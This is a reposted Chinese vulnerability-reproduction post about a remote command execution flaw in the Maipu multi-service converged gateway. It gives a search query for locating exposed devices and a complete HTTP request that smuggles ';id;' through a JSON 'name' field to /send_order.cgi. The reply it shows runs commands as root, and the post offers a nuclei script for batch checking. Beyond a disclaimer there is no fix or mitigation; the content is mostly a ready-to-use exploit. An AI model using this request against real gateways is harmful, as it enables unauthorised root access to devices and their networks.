【漏洞复现】迈普多业务融合网关远程命令执行漏洞

admin 2024年7月3日13:23:27评论2 views字数 768阅读2分33秒阅读模式

声明

该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

公众号现在只对常读和星标的公众号才展示大图推送,建议把公众号设为星标,否则可能就看不到啦!感谢各位师傅。

资产收集

title=="迈普多业务融合网关"

【漏洞复现】迈普多业务融合网关远程命令执行漏洞

漏洞复现

【漏洞复现】迈普多业务融合网关远程命令执行漏洞

发送请求

POST /send_order.cgi?parameter=operation HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestContent-Length: 40Priority: u=1{"opid":"1","name":";id;","type":"rest"}

返回包

HTTP/1.0 200 OKuid=0(root) gid=0(root)Content-Length: 29{"type":1,"msg":"ok"}

批量验证脚本

关注公众号并回复 “ZH-2024-07-01-001 即可获得该漏洞nuclei脚本

【漏洞复现】迈普多业务融合网关远程命令执行漏洞

原文始发于微信公众号(Devil安全):【漏洞复现】迈普多业务融合网关远程命令执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月3日13:23:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】迈普多业务融合网关远程命令执行漏洞http://cn-sec.com/archives/2913169.html

发表评论

匿名网友 填写信息